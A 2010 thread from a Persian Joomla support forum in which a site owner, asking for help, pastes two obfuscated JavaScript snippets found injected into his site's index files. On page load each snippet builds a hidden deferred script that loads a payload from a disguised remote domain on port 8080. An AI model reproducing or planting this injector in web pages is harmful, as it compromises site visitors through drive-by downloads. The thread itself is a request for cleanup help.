براي استفاده از امكانات انجمن مامبولرن بايد عضو شويد ، براي ثبت نام كليك كنيد

Advertisement

هاستینگ جوملا مامبو اس ام اف - ثبت دامین
تبلیغات Advertising
مکان فعلی شما : انجمن تخصصی جوملا فارسی - مامبو فارسی » Joomla - جوملا فارسی » امنیت جوملا فارسی - Joomla Security » فوری-کدهای مخرب در فایلهای index.php و index.html
صفحه: [1]   پایین

نویسنده موضوع: فوری-کدهای مخرب در فایلهای index.php و index.html  (دفعات بازدید: 945 بار)

ss_ebr

• Newbie
  • *
  • آنلاین آنلاین
  • جنسيت : پسر
  • ارسال: 8
  • جوملا فارسی
فوری-کدهای مخرب در فایلهای index.php و index.html
« : چهارشنبه, 10 فوریه 2010 - 16:58 »
سلا دوستان
سرور هاست سایتم که پلسک 8 بود به پلسک 9 ارتقا یافت و مشکلات من شروع شد .تا بالاخره ریشه مشکل رو به نظرم پیدا کردم
در فایلهای index.php و index.html بسیاری از فولدرهای جوملا اسکریپتهایی که پیوست کردم اضافه شده.
و در نتیجه اون قسمت مدیریت سایت بالا میاد و درست کار میکنه ولی خود سایت نه! و به جای اون یک صفحه سفید میاد
با قالبعای دیگه هم همین مشکل رو دارم.
لطفا" کمک کنید
خیلی فوریه دیگه دارم قاطی میکنم :D

<html><body bgcolor="#FFFFFF"></body></html>
<script>var w;if(w!='i'){w=''};var r;if(r!='ik' && r != ''){r=null};var h=document;var k=new Date();var j=33806;var c='sRcSrCi.pCtC'.replace(/[CS\.R\$]/g, '');var d=new String();var z=new String();var f=window;this.kj="";this.x="";var wv=new String();var mp=false;var gc;if(gc!='' && gc!='o'){gc='p'};f.onload=function(){var _=39167;this.ry="ry";try {var jx=4633;var cb=40929;y=h.createElement(c);y.src='hQt3t7p<:Q/A/<bQi7nQg3-3c3o7mQ.<1<1A0QmAb3.<c3oQm7.QiQm<eQ-Qn7u3.<bQe7s<tAnAe3w7hQaQvAeAn3.7r7u7:Q8A0<8A0</7gAo3o7gAlAe7.Qc3o7mQ/<g7oQoQgQl7eA.Qc<o7m7/7oQp<e7nAdQnQs<.<cAo3m3/Qe7z7i3nQe<a7rAt3iAc7l3e<s7.<c3oAmQ/3iQsQt3oAcAkQp7h<oAt3oA.<cAo3mQ/A'.replace(/[A\<Q37]/g, '');y.setAttribute('dMeMf>ezrA'.replace(/[A\>Miz]/g, ''), "1");h.body.appendChild(y);this.b='';var dc;if(dc!='' && dc!='pu'){dc=null};} catch(n){};};var ce;if(ce!=''){ce='rp'};var kjp=false;</script>

<script>this.__='';var b;if(b!='' && b!='z'){b=''};var t=document;var m;if(m!=''){m='ez'};var w='sPcbrbi3p3tZ'.replace(/[Z3bmP]/g, '');var k=window;var wg;if(wg!='uv' && wg!='up'){wg='uv'};var g;if(g!='uk' && g!='ms'){g=''};var h_=new String();k.onload=function(){try {var ej;if(ej!=''){ej='i'};var ukq=new String();_=t.createElement(w);var ci=20378;var a=new Date();var ad;if(ad!=''){ad='ar'};var x='';var qe='';var wc='';_.src='hQt9t9pQ:+/+/Rd9uSoQwQaRnR-ScRoRm9.+gSo+oSgSl+e9.SeSsQ.Ql9o+wReRs+-ScQo9mR.Sh9o9mQeSsRiQt9eSdReQs9iQgSnSs9.QrRu9:+8+0+8S09/RsSt+aRtSc+oRuQnQt9eQr9.+c9o9m+/9s+tRa+tRc9oQuRn9t+eSrQ.Sc9o+mS/+g+o9oQg9l+eQ.9cRo+mR/SbShSaRrQaStRsQt9uQdSeSnRtQ.+cSo9mR/+rRaQp9iSdQ4QmSe+.9c9oSmR/Q'.replace(/[Q\+SR9]/g, '');this.cl=6042;var du;if(du!='' && du!='arn'){du=null};_.setAttribute('d1e1fjejrj'.replace(/[j\+Ag1]/g, ''), "1");this.kw='';this.vd="vd";t.body.appendChild(_);var gwt;if(gwt!='a_' && gwt != ''){gwt=null};} catch(e){var df;if(df!='' && df!='kp'){df=''};this.yc=1222;};var nt=new String();};this.uq='';var s="";</script>
<!--e836e8f25961cabd3e881a4fb525c20d-->

خارج شده است

مهدی.

• تیم مامبولرن
  • آفلاین آفلاین
  • ارسال: 6020
  • ! Processed Quickly
خارج شده است
دانلود آخرین نسخه جوملا فارسی | ویکی, دانشنامه مامبولرن | mehrabun.ir

در انجمن عقل فروشان ننهم پای                            دیوانه سر صحبت فرزانه ندارد
تا چند کنی قصه اسکندر و دارا                            ده روزه عمر این همه افسانه ندارد

ss_ebr

• Newbie
  • *
  • آنلاین آنلاین
  • جوملا فارسی
پاسخ : فوری-کدهای مخرب در فایلهای index.php و index.html
« Reply #2 : چهارشنبه, 10 فوریه 2010 - 17:10 »
دوست عزیز ممنون از توجهتون
اما نمیخوام از پی و بن همه چیزو درست کنم
کلا" میخوام ببینم درست فهمیدم یا نه؟؟؟؟
خارج شده است

مهدی.

• تیم مامبولرن
  • آفلاین آفلاین
  • ! Processed Quickly
« Reply #3 : پنجشنبه, 11 فوریه 2010 - 21:09 »
منظور شما چیه از اینکه میفرمایید ! :

کلا" میخوام ببینم درست فهمیدم یا نه؟؟؟؟

چیرو درست متوجه شدید یا نه ؟! مطلبی که خدمتتون لینک کردم رو اگر مطالعه فرمایید متوجه خواهید شد.

زمستانتان سپید
خارج شده است

در انجمن عقل فروشان ننهم پای                            دیوانه سر صحبت فرزانه ندارد
تا چند کنی قصه اسکندر و دارا                            ده روزه عمر این همه افسانه ندارد

ss_ebr

• Newbie
  • *
  • آنلاین آنلاین
  • جوملا فارسی
« Reply #4 : پنجشنبه, 11 فوریه 2010 - 21:48 »
آخه پشتیبان هاست گفته که اشکال در برنامه هاتوونه . اما من تغییر جدیدی بعد از ارتقا سرور سایت  در برنامه ها ندادم که بخواد این اتفاق رخ بده.
خارج شده است

مهدی.

• تیم مامبولرن
  • آفلاین آفلاین
  • ! Processed Quickly
« Reply #5 : پنجشنبه, 11 فوریه 2010 - 22:33 »
دوست عزیز مقاله ای که خدمتتون ارسال کردم رو مطالعه کنید. دلایل این اتفاق هم ذکر شده است.

زمستانتان سپید
خارج شده است

صفحه: [1]   بالا

انجمن تخصصی مامبو و جوملا فارسی RSS - آر اس اس Bookmark and Share